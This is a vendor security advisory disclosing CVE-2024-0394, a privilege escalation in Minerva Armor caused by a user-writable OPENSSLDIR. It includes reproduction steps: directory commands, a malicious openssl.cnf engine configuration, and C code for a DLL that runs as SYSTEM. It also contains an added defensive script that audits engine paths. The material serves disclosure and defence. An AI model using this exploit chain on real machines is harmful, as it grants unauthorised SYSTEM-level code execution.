Last updated on Friday, April 5, 2024, 20:45:32 GMT

Rapid7 is disclosing CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva's Armor product family. Minerva uses the open-source OpenSSL library for cryptographic functions and to support secure communications. The root cause of this vulnerability is Minerva's implementation of OpenSSL's OPENSSLDIR parameter, which was set to a path accessible to low-privileged users (such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf). Rapid7 has assessed this vulnerability as having a CVSSv3 score of 7.8.

Impact

Since Minerva Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged attacker can create an openssl.cnf configuration file to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.

Credit

Rapid7 would like to thank Will Dormann of Vul Labs for disclosing this vulnerability to us in accordance with Rapid7's vulnerability disclosure policy. We are grateful to Will and the security research community for their work to make software and systems safer for everyone.

Product Description

Minerva Armor technology is a core endpoint security component (Windows only) aimed at preventing evasive malware, ransomware, and advanced cyberattacks. Armor is operated and trusted by SMBs and enterprise organizations around the world across a diversity of sectors and verticals.

Minerva Armor technology was developed by Minerva Labs, which was acquired by Rapid7 in March 2023. Armor is part of a product family that includes Minerva Armor and Rapid7 next-generation antivirus (NGAV). Armor was previously used as an OEM component in Intego AV. Note: The Insight agent is not vulnerable to this issue.

Exploitation

During the Armor 32-bit service startup (MVArmorService32.exe), Armor loads the OpenSSL library. OpenSSL is a library that provides a variety of cryptographic functions. This library has an internal directory tree that is used to locate the configuration file; this directory is called OPENSSLDIR. Inside OPENSSLDIR resides the configuration file openssl.cnf. This is where the privilege escalation opportunity begins.

When an application depends on the OpenSSL library, the full path to OPENSSLDIR must be specified at compile time, but at runtime this path is not required. Consequently, the full path can be discovered using reverse engineering techniques and tools such as strings, ProcMon, and others.

If an attacker can place an openssl.cnf file and specify a malicious library for loading, the attacker's code is executed instead. The root cause of this vulnerability lies in the OpenSSL library's configuration in Minerva, where the OPENSSLDIR parameter was set to a path accessible to low-privileged users, such as C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf. Because Armor runs as a Windows service, this vulnerability enables any authenticated user to elevate privileges and execute arbitrary code with SYSTEM privileges. A low-privileged user can create the openssl.cnf configuration file mentioned above to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.

Below is a ProcMon capture of the Armor service looking for the openssl.cnf file:

Steps to Reproduce

All steps are executed as a low-privileged authenticated user:

  1. Create a "C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static" directory:
    mkdir "C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static"
  2. Create an openssl.cnf file in that directory with the following contents:
    openssl_conf = openssl_init
    [openssl_init]
    engines = engine_section
    [engine_section]
    woot = woot_section
    [woot_section]
    engine_id = woot
    dynamic_path = c:\\danik\\calc.dll
    init = 0
  3. Create the c:\danik folder:
    mkdir "C:\danik"
  4. Compile and link a malicious "OpenSSL library"; the code below will run Windows Calculator:
    #include <windows.h>
    #include <stdlib.h>   /* system() */

    BOOL WINAPI DllMain(
        HINSTANCE hinstDLL,
        DWORD fdwReason,
        LPVOID lpvReserved)
    {
        switch (fdwReason)
        {
            case DLL_PROCESS_ATTACH:
                system("calc");
                break;
            case DLL_THREAD_ATTACH:
                // Perform thread-specific initialization.
                break;
            case DLL_THREAD_DETACH:
                // Perform thread-specific cleanup.
                break;
            case DLL_PROCESS_DETACH:
                // Perform any necessary cleanup.
                break;
        }
        return TRUE;  // Successful DLL_PROCESS_ATTACH.
    }
  5. Copy the calc.dll built above into the "C:\danik" directory.
  6. Restart the Armor service or the whole machine.
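As an added defender-side check (example code, not Rapid7's or Minerva's): the script below walks the openssl_conf -> engines -> engine section -> dynamic_path chain that the configuration above relies on and flags any engine DLL that would be loaded from outside an assumed list of trusted directories, so an administrator can audit an openssl.cnf found at an OPENSSLDIR location. The sample config, the trusted prefixes and all function names are constructed assumptions.

```python
"""Audit an openssl.cnf for 'dynamic' engines loading a DLL from an untrusted path.
Added example, not Rapid7/Minerva code; sample config and trusted prefixes are assumed."""
import ntpath
import re

# Constructed sample modelled on the PoC config in the steps above.
SAMPLE_CNF = """openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\\\danik\\\\calc.dll
init = 0
"""
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\windows\\system32\\")  # assumed safe dirs

def parse_cnf(text):
    """Minimal OpenSSL-style parser -> {section: {key: value}}; pre-section keys go to 'default'."""
    sections, current = {"default": {}}, "default"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"\[\s*(\S+)\s*\]$", line)
        if m:
            current = m.group(1)
            sections.setdefault(current, {})
            continue
        if "=" in line:
            key, val = (p.strip() for p in line.split("=", 1))
            sections[current][key.lower()] = val
    return sections

def find_dynamic_engines(text):
    """Follow openssl_conf -> engines -> engine sections; return (engine_id, dll_path, is_trusted)."""
    s = parse_cnf(text)
    init_sec = s["default"].get("openssl_conf")
    engines_sec = s.get(init_sec, {}).get("engines") if init_sec else None
    findings = []
    for engine_sec in s.get(engines_sec, {}).values():
        sec = s.get(engine_sec, {})
        path = sec.get("dynamic_path")
        if path is None:  # built-in engine, no DLL load to audit
            continue
        norm = ntpath.normpath(path.replace("\\\\", "\\")).lower()
        findings.append((sec.get("engine_id", engine_sec), norm, norm.startswith(TRUSTED_PREFIXES)))
    return findings
```

Run against SAMPLE_CNF it reports the "woot" engine pulling c:\danik\calc.dll from an untrusted directory; a config with no openssl_conf entry or with only built-in engines yields no findings.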

Remediation

To remediate CVE-2024-0394, Minerva customers should update to the latest release:

Customer                       Fixed version
Minerva customers              Armor version 4.5.5
Minerva Armor OEM customers    Armor OEM version 4.5.5

Disclosure Timeline

January 8, 2024: Issue reported to Rapid7 by Will Dormann of Vul Labs
January 9, 2024: Rapid7 acknowledges the report
January 11, 2024: Rapid7 reproduces issue, confirms vulnerability
January to February 2024: Rapid7 engineering team develops and tests a fix, requests information from partner on potentially vulnerable implementation; partner confirms they are no longer offering the vulnerable implementation.
March 12, 2024: Rapid7 contacts reporter to ask whether our fix timeline had been previously communicated
March 19, 2024: Rapid7 assigns CVE, updates reporter on fix readiness, confirms affected/fixed versions. Rapid7 and reporter agree on April 3, 2024 as a coordinated disclosure date.
April 3, 2024: This disclosure; fix released.